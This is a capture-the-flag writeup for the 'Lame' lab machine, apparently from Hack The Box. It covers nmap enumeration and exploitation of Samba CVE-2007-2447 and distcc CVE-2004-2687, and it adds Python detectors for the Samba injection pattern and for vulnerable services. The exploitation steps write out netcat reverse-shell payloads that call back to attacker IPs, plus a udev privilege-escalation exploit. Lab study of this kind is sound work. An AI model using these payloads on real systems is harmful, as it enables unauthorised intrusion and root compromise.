Lame Writeup

Without Metasploit

Reconnaissance

Initial Nmap scan to find open ports, treating the host as online and skipping host discovery (-Pn)

nmap -Pn 10.10.10.3

Nmap scan of all ports (including UDP), so that we do not miss any ports that did not show up in the initial scan

Nmap scan for service versions (-sV), running the default scripts (-sC) against ports 21, 22, 139 and 445 (-p), saving the output to a file called nmap (-oN).

nmap -sC -sV -p 21,22,139,445 -oN nmap 10.10.10.3

Enumeration

Port 21: FTP; vsftpd 2.3.4

The first thing to do is to search for this version on Google and look for known exploits.

The first link is a Metasploit tutorial on how to exploit it, but we are doing this without Metasploit, so let's click the second link.

Now we can copy this exploit from the page, or search for it with searchsploit and copy it to our working directory from there.

searchsploit vsftpd 2.3.4

Now let's copy the exploit to our directory

searchsploit -m unix/remote/49757.py

I tried exploiting this using the Python exploit we found, but it constantly showed a timeout error, which means that the exploit is probably outdated and does not work anymore.

The next thing to do is to enumerate the anonymous FTP login ("Anonymous FTP login allowed") that our nmap scan reported.

Let us log in

Username: anonymous

Password: anonymous

Let's list what the FTP server contains

and... nothing. Well, at least we tried. 😉

Port 22: SSH; OpenSSH 4.7p1

Searching on Google does not give us anything interesting. Usually we cannot exploit port 22 directly; we only use it to SSH into the machine after we find a username and password from other ports, or if we find an id_rsa file.

Ports 139 and 445: Samba

Ports 139 and 445 are Samba ports, and we usually find exploits there, so let us enumerate them.

smbclient is a very common tool used to enumerate Samba ports, so let us use smbclient to access the SMB server.

smbclient -L 10.10.10.3 # "-L" lists what services are available 

Now let us look at the permissions on the shares with smbmap (the -H flag specifies the host)

smbmap -H 10.10.10.3

Looking at this, we can see that we have read and write permissions on the tmp share of the SMB server. Let's look for vulnerabilities in this Samba version, in particular code execution ones, since we have write access to a share.

After searching for a while I found an exploit that looks like the one we want: CVE-2007-2447.

Reading through the exploit, we can understand that it executes arbitrary commands via shell metacharacters. Let's search for it on exploit-db and look at the code.

username = "/=`nohup " + payload.encoded + "`"

This line tells us that our payload goes in the "payload.encoded" slot, so we can try putting a simple Netcat reverse shell there and catch it with a listener.
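As the defender's counterpart to the injection pattern above, here is an added example (not code from this writeup or from Samba) that flags the CVE-2007-2447 input shape in smbd authentication messages and checks whether an smb.conf enables the username map script option, which is the setting that hands the username to a shell. The log lines are constructed samples modelled on smbd's check_ntlm_password messages, and the smb.conf snippets and script path are made up.

```python
"""Detect the CVE-2007-2447 input shape in smbd logs and the smb.conf option behind it.

Added example, not code from this writeup or from Samba.  SAMPLE_SMBD_LOG is a
constructed sample modelled on smbd's check_ntlm_password messages (log level 2+);
the smb.conf snippets used in tests and the script path are made up.
"""
import re

# Characters that let a username break out of the mapping command's argument.
METACHAR_RE = re.compile(r"[`;|&$(){}<>\n]")
# "Authentication for user [NAME] -> [NAME] FAILED ..." as smbd writes it at log level 2.
AUTH_RE = re.compile(r"Authentication for user \[(?P<user>.*?)\] -> \[")
# An uncommented 'username map script = ...' line (smb.conf comments start with ; or #).
MAP_SCRIPT_RE = re.compile(r"^\s*username map script\s*=\s*\S", re.IGNORECASE | re.MULTILINE)

SAMPLE_SMBD_LOG = """\
[2024/05/01 10:00:01, 2] check_ntlm_password
  check_ntlm_password:  Authentication for user [alice] -> [alice] FAILED with error NT_STATUS_WRONG_PASSWORD
[2024/05/01 10:00:07, 2] check_ntlm_password
  check_ntlm_password:  Authentication for user [/=`nohup id`] -> [/=`nohup id`] FAILED with error NT_STATUS_NO_SUCH_USER
[2024/05/01 10:00:09, 2] check_ntlm_password
  check_ntlm_password:  Authentication for user [bob] -> [bob] succeeded
"""


def classify_username(username):
    """Return None for a plain username, otherwise a short reason it should be alerted on."""
    if not METACHAR_RE.search(username):
        return None
    if username.startswith("/="):
        # "/=" mimics a username-map entry; followed by metacharacters it is the CVE-2007-2447 shape.
        return "username map script injection pattern (CVE-2007-2447)"
    return "shell metacharacters in username"


def scan_smbd_log(lines):
    """Return (line_number, username, reason) for every authentication attempt worth alerting on."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = AUTH_RE.search(line)
        if not m:
            continue
        reason = classify_username(m["user"])
        if reason:
            hits.append((number, m["user"], reason))
    return hits


def smbconf_uses_username_map_script(conf_text):
    """True if the config enables the option that passes usernames to a shell command."""
    return MAP_SCRIPT_RE.search(conf_text) is not None


if __name__ == "__main__":
    for number, user, reason in scan_smbd_log(SAMPLE_SMBD_LOG.splitlines()):
        print(f"line {number}: {reason}: {user!r}")
```

The username check deliberately treats any metacharacter as worth an alert, not only the "/=" prefix: a legitimate account name never contains a backtick or a semicolon, so the broader rule costs nothing in false positives. Patching Samba is the real fix; the smb.conf check tells you whether an unpatched host is actually exposed.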

Port 3632: distcc v1

Let us search Google for some information on this service.

Google says that this service is vulnerable to a remote code execution vulnerability and we can use a nmap script that will give us more information.
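To turn the enumeration above into a repeatable inventory check, here is an added example (not from the writeup) that parses nmap's normal (-oN) output and flags the services this page found worth investigating. The scan text is a constructed sample laid out like -oN output, not a capture of the box, and the watchlist entries restate only what this page says about each service.

```python
"""Parse nmap -oN output and flag the services this writeup enumerated.

Added example, not part of the original writeup.  SAMPLE_NMAP_OUTPUT is a
constructed text in nmap's normal-output layout, not a capture of the box.
"""
import re
from dataclasses import dataclass, field

# One "PORT STATE SERVICE VERSION" row, e.g. "21/tcp   open  ftp   vsftpd 2.3.4"
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$"
)
# First line of an NSE script result, e.g. "|_ftp-anon: Anonymous FTP login allowed"
SCRIPT_RE = re.compile(r"^\|[_ ](?P<script>[\w-]+):\s*(?P<output>.*)$")

SAMPLE_NMAP_OUTPUT = """\
# Nmap scan initiated as: nmap -sC -sV -p 21,22,139,445,3632 -oN nmap 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.045s latency).

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 (protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1

# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
"""


@dataclass
class Service:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)  # NSE script name -> first output line


def parse_nmap_normal(text):
    """Return the Service rows found in -oN text, with their NSE one-liners attached."""
    services, current = [], None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = Service(int(m["port"]), m["proto"], m["state"],
                              m["service"], m["version"].strip())
            services.append(current)
            continue
        m = SCRIPT_RE.match(line)
        if m and current is not None:
            current.scripts[m["script"]] = m["output"].strip()
    return services


# (predicate, finding). The findings restate only what this writeup established.
WATCHLIST = [
    (lambda s: s.version.startswith("vsftpd 2.3.4"),
     "vsftpd 2.3.4: release with a public exploit (searchsploit 49757); upgrade"),
    (lambda s: "Anonymous FTP login allowed" in s.scripts.get("ftp-anon", ""),
     "anonymous FTP login enabled: disable unless the share is meant to be public"),
    (lambda s: s.version.startswith("Samba"),
     "Samba: check smb.conf for 'username map script' (CVE-2007-2447) and patch"),
    (lambda s: s.service == "distccd",
     "distccd reachable: CVE-2004-2687 remote command execution; firewall it off"),
]


def flag_services(services):
    """Return (port, finding) pairs for every open service that matches the watchlist."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        for predicate, finding in WATCHLIST:
            if predicate(s):
                findings.append((s.port, finding))
    return findings


if __name__ == "__main__":
    for port, finding in flag_services(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)):
        print(f"{port:>5}  {finding}")
```

Point the parser at the file written by -oN (the writeup's is called nmap) to get the same findings for a real scan; the parser only keeps the first line of each NSE result, which is enough for the one-line ftp-anon verdict used here.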

Exploitation

Samba

Let's start a Netcat listener on our machine

nc -nvlp 1234

Now let us connect to the SMB server we found while enumerating, using smbclient

smbclient //10.10.10.3

Now we send the shell metacharacters, wrapped around a reverse shell payload, as the username, so that the command runs and connects back to our machine.

We can find a good reverse shell on pentestmonkey's reverse shell cheat sheet. Replace the IP with yours; you can find your IP with this command.

ifconfig 

It is the address next to inet under tun0 (make sure you are connected to the VPN with OpenVPN).

Now let us add our payload in the username parameter

logon "/=`nohup rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f -e /bin/sh`"

"logon" is the smbclient command used to log on as a user.

After pressing Enter, you should get a reverse shell on your listener.

And we are root :). Go get both flags.

Distcc

In the enumeration part we found that this service is vulnerable to CVE-2004-2687, and that there is an nmap script that can be used to exploit it.

nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"

This is the nmap command with the test command 'id'; now we put a reverse shell payload in its place instead.

nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f -e /bin/sh'"

Let's start a Netcat listener, enter the command, and wait for a connection.

And we get a reverse shell, but as an unprivileged user :/. Time to escalate privileges and get root.

Let's check the OS version and look for exploits

uname -a

After a lot of searching I found an exploit that might work; let's copy it from searchsploit.

Now we have to transfer it to the victim machine. We can do this by starting a Python HTTP server on our machine and fetching the file with "wget" on the victim.

We can see that it transferred successfully. Now we compile the .c file with gcc, naming the output exploit.

gcc 8572.c -o exploit

To run it, we follow the instructions included in the exploit's header.

First we have to find the PID of the udevd netlink socket, which we can do with this command

ps -aux | grep devd

Then we subtract one from the udevd PID, which gives 2740.

Now we create a file called run in the /tmp folder and put our payload in it, which will be our reverse shell.

First we need to add

#!/bin/bash 

to the file, so that it is recognised as a bash script

echo '#!/bin/bash' > run
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f' >> run

After this, start a listener on your machine and run the exploit with the PID minus one as its argument.

./exploit 2740

After this you should have root :)
